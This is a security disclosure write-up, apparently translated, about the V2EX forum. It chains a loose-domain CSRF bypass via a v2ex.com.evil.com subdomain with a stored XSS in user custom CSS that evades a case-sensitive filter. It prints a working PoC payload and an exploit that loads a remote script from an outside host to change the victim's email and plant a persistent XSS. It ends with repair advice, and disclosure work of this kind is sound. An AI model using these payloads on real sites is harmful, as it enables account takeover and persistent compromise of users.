Rootkit XSS means the attacker keeps control of an account for a long time: the payload fires every time the user visits v2ex, so we effectively have a persistent XSS shell.
1. Account takeover through CSRF

The CSRF is possible because of a defect in how v2ex checks the domain a request comes from: the check matches "v2ex.com" loosely, so it can be bypassed by resolving a subdomain of evil.com as v2ex.com.evil.com and sending the cross-domain POST request from v2ex.com.evil.com to v2ex.com/settings to change the user's settings.

Attack method: build a page that automatically submits a POST form to v2ex to change the victim's e-mail address. The password can then be changed through the password reset function.

2. Rootkit XSS

The V2EX community lets users customise their CSS, and the custom CSS is output into the HTML on every page load, so the style block can be closed off. I did some tests and found that </style> and <script> are filtered, but their uppercase forms are not.

POC: </STYLE><SCRIPT>alert(1)</SCRIPT>

Combined with the CSRF above, we can set the victim's custom CSS cross-domain and implant the rootkit XSS.
Exp:
<script src="http://mmme.me/xss.js"></script><script>xss.csrf('http://v2ex.com/settings',{'email':'pkav@gmail.com','bio':123,'list_rich':0,'show_balance':1,'show_hi_dpi':0,'show_my_nodes':0,'use_my_css':1,'my_css':'</STYLE><SCRIPT>alert(/pkav/)<\/SCRIPT>','show_ads':1});</script>
Solution:
I mentioned this vulnerability to @Livid once, but it seems my repair suggestions were not accepted. At that time no verification was performed at all, and the custom CSS could be closed with </st</style>yle>.

1. Verify CSRF with a token.
2. If the custom CSS cannot be set through CSRF, this module does not even need to be filtered.